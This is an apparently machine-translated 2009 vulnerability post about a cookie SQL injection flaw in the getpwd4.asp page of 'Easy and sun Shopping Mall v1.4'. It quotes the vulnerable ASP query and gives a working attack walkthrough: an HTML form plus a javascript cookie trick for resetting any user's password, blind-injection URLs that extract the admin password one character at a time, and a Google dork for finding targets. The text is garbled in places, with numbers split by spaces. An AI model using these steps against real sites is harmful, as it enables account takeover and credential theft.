Easy and sun Shopping Mall v1. 4Cookies injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200925724
Type myhack58
Reporter 佚名
Modified 2009-12-26T00:00:00


Easy and sun Shopping Mall v1. 4Cookies injection vulnerability This injection vulnerability seems to occur in the Home Shopping system. Looks like the network fun. The problem occurs in getpwd4. asp page. See the code:

<% username=request("username") passwd=md5(trim(request. form("passwd")),1 6) set rs=Server. CreateObject("Adodb. Recordset") sql="select * from bjx_User where username=’"&username&"’" rs. open sql,conn,1,3 If rs. eof Then %> <script language="javascript"> alert("this user has not registered yet, please go to home REGISTER now!") location. href="javascript:history. back()" </script>

System added anti-injection, get and post for the time being do not say, would give us the username for Cookie injection. In the tools on the wandering around time also found this problem. To borrow a paragraph: Because the program idea is to want to accept from the previous Set Password Form files submitted over the variables, but here we can not give it to submitted form variables, but allow it to accept our cookie set, the passwd is to use the request. from to accept, so we use the form to submit.

Form content:

<form method="post" action="http://localhost/getpwd4.asp" > <!-- The following 1 2 3 4 5 6 to change the new password--> <input name="passwd" type="text" id="receipt" size="1 2" value="1 2 3 4 5 6"> <input class=go-wenbenkuang type="submit" value=" set password " name="submit"> </form>

First, to modify any user password method, the above code is saved as a local htm file, pay attention to modify the target URL. Then open the page, clear the address bar, enter javascript:alert(document. cookie="username="+escape("shaun")) the user must be a site there. Open the local htm file, click on the Set Password return new password is set successfully. Otherwise return the user to register, please go to the front Desk to register. Second, we further injection, get Admin Account and password. JS statement in it doesn't work. With injection secondary generated a injected into the page. Hand guess statement: http://localhost/jmCook.asp?jmdcw=shaun’%20and%2 0(select%20top%2 0 1%20asc(mid(password,1,1))%20from%20bjx_admin)>5 4%20and%2 0’=’ 0-9 corresponds to the ASCII 48-57 letter a-z corresponding to 9 7-1 2 2 as shown in Fig >5 4 to return to normal,

>5 5 return an error, indicating the password of the first bit of the ASCII 5 5 i.e., the number 7, and so on,

But this hand guess the solution is too slow, then you can use the tool, but the premise also to generate a dedicated page. To Pangolin, he the character type of injection is better. Manually add a table name BJX_admin

Google for: inurl:product. asp? Iheeoid= This article from the San ㄗ Feng 訫 locks of love’S Blog http://www.virusest.com/